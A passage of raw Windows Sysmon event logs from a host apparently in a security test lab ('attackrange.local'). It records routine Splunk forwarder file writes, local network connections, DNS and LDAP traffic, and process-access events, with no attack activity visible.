Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9019BF68C7C05EEEEFC9F38DB5FE954F,SHA256=A2A906C061822B4AEF8EA8E3E8D9EE242D0215D69E0F59E0EF1C59D6D0C390B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202959Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:36.010{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60683-false10.0.1.12-8000- 23542300x80000000000000002202958Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:40.299{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54D84A73A0ECC3E5BAB7BFBA75F88455,SHA256=DFD998425C5075CDF19FC9983396378711F075F6F65BCFE64144FE41A39202D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202961Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:41.314{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C50DEEADE25300B24463993B2AC81A85,SHA256=518DDD1C182C0E0EE348D5B6770889D5F1668CEBFED3FD6D591FAA298E3196EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202962Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:42.330{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3953CD36B437218843D16C7B6FEFCF9A,SHA256=0F8895CF13F99D1F7864B0294C1053C804518BDC94C7DA60163AFBA468AA7265,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202963Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:43.330{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=139DFB82737D60DB63EFFDD663711715,SHA256=0F310E386CB3CAF319BAA54A53BAD93CF668FB8F13E63A200F4A16105DD223F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202965Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:44.346{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=205892622132D99E0103EF0492326776,SHA256=D349ED1EAD53E54F4838C09018F0BC4DC2D33F471B93719B94AC219D126AD97D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202964Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:44.205{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8BC77F7477C0C8D765B6FC382DE8941,SHA256=C53583463800831905406494DFBCEB42763C59DE887D059C6AE48DACB7622687,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202967Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:41.026{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60685-false10.0.1.12-8000- 23542300x80000000000000002202966Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:45.361{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DCE62AC3FA2C281E8D05297D9C19806,SHA256=60E54D27BB7B1BB79E2643B18B72CC05783FBD6961D1230203F9854F497401AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202968Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:46.377{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51FF6539F60D5CA093C8420581FCDC36,SHA256=DFAC9EE5720A43E51B271D836E431F25BB833BF63B3DD702C0A13459153DDFCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202969Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:47.392{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54D30054E4C65D77CCC366EFADF30B22,SHA256=FDB6A2FD25BE2E1F129DE141642DB0C0BE4042C812B51B0FFFD1DB1407AA8AF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202970Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:48.408{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DE9F174613805DA2658B0858F66D41E,SHA256=6385D5D08FB54E22484739A642E7E915275038016504D25BF3E45A8BDF32FFFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202971Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:49.408{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85367C2CFFEB4A44482685AFEE3CEA52,SHA256=C87D7DD5604AB443030B6719F6FEA86E1023BE598A9956DA920D7D7B8474510A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202975Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:46.901{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60686-false10.0.1.12-8000- 23542300x80000000000000002202974Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:50.424{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67EBEFD10BA72BC5C516255C9DD57E78,SHA256=3FB0DB2CBB3C266E06C483E7C09C7EEF09563F5BE83DD0FBEFE9FAB026EEAB25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202973Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:50.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADF06EAEE5F7946BEFCC4718CBEA5110,SHA256=B1872895D37683A6EF1365C09E0A73EDC3B53C3268DBE0F643F86238A5441AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202972Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:50.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53F0632E9499257C4764427C57382EDD,SHA256=8A8B892DF42C517A97C3E5ED7F0C6AB61C2D7D50F86C3B5374ADCC7A222F2A99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202976Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:51.439{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97752275B1008E9F4799AD7BA2E2BF02,SHA256=B13CDFFBE473793DFBB5F3C13C0F168F369B7283FF0C555488FD08F8C66FD4C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202977Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:52.455{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DDF6ABE03A75C599CC1875C5327E4B5,SHA256=5332DC12782460EA25764A3602A7976DDE83053729B9A74E69602A8213C5A0D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202980Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:49.994{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55314- 23542300x80000000000000002202979Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:53.455{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27F97C5807009D11D278018CE9E54C58,SHA256=61D1001EA20E5B6EA200B359C0F58A114C993E9290C672DF947D8967EB7E5EAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202978Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:53.189{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADF06EAEE5F7946BEFCC4718CBEA5110,SHA256=B1872895D37683A6EF1365C09E0A73EDC3B53C3268DBE0F643F86238A5441AC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202982Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:50.994{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-55314- 23542300x80000000000000002202981Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:54.471{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98F980A7D9FD7B10357BD5C1112ADCD1,SHA256=5AA8E50CCDD186689F11B7AC11F08406ADD83FF35AEAED0A89A28B12F6DC9668,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202985Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:51.947{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60687-false10.0.1.12-8000- 23542300x80000000000000002202984Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:55.486{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC595FCE1BFDD70E49888FFE2391AB2D,SHA256=B4F76E25CFD0D27C730A6F1FDE840FE19707065F58051D789B3F887EED605477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202983Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:55.299{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7223C1A78AFF25BCB80ECEA7B0940089,SHA256=49136C806FE2269D61B8C293E15E4915FB4021017AB42C72BD88CA70AB56364A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202986Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:56.486{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=955A35A39522FFEF903A290B2C3A674B,SHA256=F2CA7ED7129251287D1F0B84776F06ABFD856677E10852899E32BBF8728F71E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202988Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:57.502{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F50F7F2E6643D9E128AA202AB93B7C19,SHA256=800565B9347EBAAE8CD5200E75C5B840C607A9E11A514B9F83ABB8BEB735782C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202987Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:57.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D204234526228BCA7C5DBFFF40E6EA6,SHA256=96CE567C9B783E9C85D7E174A5F2AF510449B09458D8F4BFB6874C26C314853E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202991Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:58.517{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ECBE4C963E52CC61055B1938B874C0D,SHA256=1D16610B50F6C6D431F6288029C1E90A0D987074D1CF131C444B60BFF51FF27D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202990Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:53.901{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60688-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002202989Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:53.901{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60688-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002202992Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:59.533{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B43D81E5F8B7A402BA0A9E8F0BD049C,SHA256=716523F39929A2FDD95573BC8ADC9D7991C9BBC13C20975FE79C4C0289514F6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202994Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:00.549{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8732917BBEE3F32DCAB921CDEC3977BD,SHA256=58D684A8F50D92AAACB90159C130E1274EBA73E6E1766BEFB82976C6AA8E7377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202993Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:00.205{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DCF95201E2D551DCFAEBCF85FAB1E17,SHA256=507068C578954DDF94BA71F2DF7CE2A1CEECD968206853BB72B5A9A30CFD7F5D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202997Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:57.026{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60689-false10.0.1.12-8000- 23542300x80000000000000002202996Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:01.564{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D53D0FCC7F17D3A868534A5102B1BB70,SHA256=9250BA87A2890B55F5BA2FD317B8B4CBE33D2C43998B77A8AD61CF6D018ECDEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202995Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:01.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D8C0CE7690E84B9ECC4D739A1664178,SHA256=7196E3DA102CA4CDC7BACBB913711399E769F82A3C53259CCB0D0C765684A78B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203014Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.861{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E986-6040-3B4E-00000000AD01}4080C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203013Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.861{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203012Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.861{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203011Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.861{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203010Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.861{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203009Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.861{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E986-6040-3B4E-00000000AD01}4080C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203008Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.861{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E986-6040-3B4E-00000000AD01}4080C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203007Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:02.862{5ABCFE62-E986-6040-3B4E-00000000AD01}4080C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 